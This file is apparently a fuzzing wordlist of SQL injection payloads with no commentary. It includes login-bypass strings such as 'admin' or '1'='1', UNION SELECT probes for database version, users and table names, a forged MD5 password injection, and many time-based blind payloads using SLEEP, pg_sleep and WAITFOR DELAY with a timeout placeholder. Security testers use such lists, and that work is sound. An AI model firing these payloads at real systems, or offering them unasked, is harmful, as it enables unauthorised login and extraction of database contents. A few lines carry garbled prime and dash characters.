'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
==
=
'
' --
' #
' –
'--
'/*
'#
" --
" #
"/*
' and 1='1
' and a='a
 or 1=1
 or true
' or ''='
" or ""="
1′) and '1′='1–
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
 and 1=1
 and 1=1–
' and 'one'='one
' and 'one'='one–
' group by password having 1=1--
' group by userid having 1=1--
' group by username having 1=1--
 like '%'
 or 0=0 --
 or 0=0 #
 or 0=0 –
' or         0=0 #
' or 0=0 --
' or 0=0 #
' or 0=0 –
" or 0=0 --
" or 0=0 #
" or 0=0 –
%' or '0'='0
 or 1=1
 or 1=1--
 or 1=1/*
 or 1=1#
 or 1=1–
' or 1=1--
' or '1'='1
' or '1'='1'--
' or '1'='1'/*
' or '1'='1'#
' or '1′='1
' or 1=1
' or 1=1 --
' or 1=1 –
' or 1=1--
' or 1=1;#
' or 1=1/*
' or 1=1#
' or 1=1–
') or '1'='1
') or '1'='1--
') or '1'='1'--
') or '1'='1'/*
') or '1'='1'#
') or ('1'='1
') or ('1'='1--
') or ('1'='1'--
') or ('1'='1'/*
') or ('1'='1'#
'or'1=1
'or'1=1′
" or "1"="1
" or "1"="1"--
" or "1"="1"/*
" or "1"="1"#
" or 1=1
" or 1=1 --
" or 1=1 –
" or 1=1--
" or 1=1/*
" or 1=1#
" or 1=1–
") or "1"="1
") or "1"="1"--
") or "1"="1"/*
") or "1"="1"#
") or ("1"="1
") or ("1"="1"--
") or ("1"="1"/*
") or ("1"="1"#
) or '1′='1–
) or ('1′='1–
' or 1=1 LIMIT 1;#
'or 1=1 or ''='
"or 1=1 or ""="
' or 'a'='a
' or a=a--
' or a=a–
') or ('a'='a
" or "a"="a
") or ("a"="a
') or ('a'='a and hi") or ("a"="a
' or 'one'='one
' or 'one'='one–
' or uid like '%
' or uname like '%
' or userid like '%
' or user like '%
' or username like '%
' or 'x'='x
') or ('x'='x
" or "x"="x
' OR 'x'='x'#;
'=' 'or' and '=' 'or'
' UNION ALL SELECT 1, @@version;#
' UNION ALL SELECT system_user(),user();#
' UNION select table_schema,table_name FROM information_Schema.tables;#
admin' and substring(password/text(),1,1)='7
' and substring(password/text(),1,1)='7
' or 1=1 limit 1 -- -+
'="or'
"0"XOR(if(now()=sysdate()%2Csleep(%__TIME_OUT__%)%2C0))XOR"Z"
0'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR'Z
0\"XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR\"Z
1 or pg_sleep(%__TIME_OUT__%)--
1) or pg_sleep(%__TIME_OUT__%)--
1)) or pg_sleep(%__TIME_OUT__%)--
1 or sleep(%__TIME_OUT__%)#
1) or sleep(%__TIME_OUT__%)#
1)) or sleep(%__TIME_OUT__%)#
1') WAITFOR DELAY '%__TIME_OUT__%' AND ('1337'='1337
1) WAITFOR DELAY '%__TIME_OUT__%' AND (1337=1337
';%5waitfor%5delay%5'%__TIME_OUT__%'%5--%5
AND (SELECT * FROM (SELECT(SLEEP(%__TIME_OUT__%)))bAKL) AND 'vRxe'='vRxe
AND (SELECT * FROM (SELECT(SLEEP(%__TIME_OUT__%)))nQIP)
AND (SELECT * FROM (SELECT(SLEEP(%__TIME_OUT__%)))nQIP)#
AND (SELECT * FROM (SELECT(SLEEP(%__TIME_OUT__%)))nQIP)--
AND (SELECT * FROM (SELECT(SLEEP(%__TIME_OUT__%)))YjoC) AND '%'='
AnD SLEEP(%__TIME_OUT__%)
AnD SLEEP(%__TIME_OUT__%)#
AnD SLEEP(%__TIME_OUT__%)--
' AnD SLEEP(%__TIME_OUT__%) ANd '1
and WAITFOR DELAY '%__TIME_OUT__%'
and WAITFOR DELAY '%__TIME_OUT__%'--
") IF (1=1) WAITFOR DELAY '%__TIME_OUT__%'--
ORDER BY SLEEP(%__TIME_OUT__%)
ORDER BY SLEEP(%__TIME_OUT__%)#
ORDER BY SLEEP(%__TIME_OUT__%)--
" or pg_sleep(%__TIME_OUT__%)--
") or pg_sleep(%__TIME_OUT__%)--
")) or pg_sleep(%__TIME_OUT__%)--
' or pg_sleep(%__TIME_OUT__%)--
') or pg_sleep(%__TIME_OUT__%)--
')) or pg_sleep(%__TIME_OUT__%)--
or pg_SLEEP(%__TIME_OUT__%)
or pg_SLEEP(%__TIME_OUT__%)#
or pg_SLEEP(%__TIME_OUT__%)--
" or sleep(%__TIME_OUT__%)#
" or sleep(%__TIME_OUT__%)="
") or sleep(%__TIME_OUT__%)="
")) or sleep(%__TIME_OUT__%)="
' or sleep(%__TIME_OUT__%)#
' or sleep(%__TIME_OUT__%)='
') or sleep(%__TIME_OUT__%)='
')) or sleep(%__TIME_OUT__%)='
or SLEEP(%__TIME_OUT__%)
or SLEEP(%__TIME_OUT__%)#
or SLEEP(%__TIME_OUT__%)--
or SLEEP(%__TIME_OUT__%)="
or SLEEP(%__TIME_OUT__%)='
or WAITFOR DELAY '%__TIME_OUT__%'
or WAITFOR DELAY '%__TIME_OUT__%'--
pg_sleep(%__TIME_OUT__%)--
pg_SLEEP(%__TIME_OUT__%)
pg_SLEEP(%__TIME_OUT__%)#
pg_SLEEP(%__TIME_OUT__%)--
(SELECT * FROM (SELECT(SLEEP(%__TIME_OUT__%)))ecMj)
(SELECT * FROM (SELECT(SLEEP(%__TIME_OUT__%)))ecMj)#
(SELECT * FROM (SELECT(SLEEP(%__TIME_OUT__%)))ecMj)--
sleep(%__TIME_OUT__%)#
&&SLEEP(%__TIME_OUT__%)
&&SLEEP(%__TIME_OUT__%)#
&&SLEEP(%__TIME_OUT__%)--
+ SLEEP(%__TIME_OUT__%) + '
SLEEP(%__TIME_OUT__%)#
SLEEP(%__TIME_OUT__%)--
SLEEP(%__TIME_OUT__%)="
SLEEP(%__TIME_OUT__%)='
'&&SLEEP(%__TIME_OUT__%)&&'1
SLEEP(%__TIME_OUT__%)/*' or SLEEP(%__TIME_OUT__%) or '" or SLEEP(%__TIME_OUT__%) or "*/
"));waitfor delay '%__TIME_OUT__%'--
");waitfor delay '%__TIME_OUT__%'--
";waitfor delay '%__TIME_OUT__%'--
'));waitfor delay '%__TIME_OUT__%'--
');waitfor delay '%__TIME_OUT__%'--
';waitfor delay '%__TIME_OUT__%'--
));waitfor delay '%__TIME_OUT__%'--
);waitfor delay '%__TIME_OUT__%'--
;waitfor delay '%__TIME_OUT__%'--
waitfor delay '%__TIME_OUT__%'
waitfor delay '%__TIME_OUT__%'#
waitfor delay '%__TIME_OUT__%'--
") WAITFOR DELAY '%__TIME_OUT__%'--
%' WAITFOR DELAY '%__TIME_OUT__%'--
'))) WAITFOR DELAY '%__TIME_OUT__%'--
';WAITFOR DELAY '%__TIME_OUT__%'--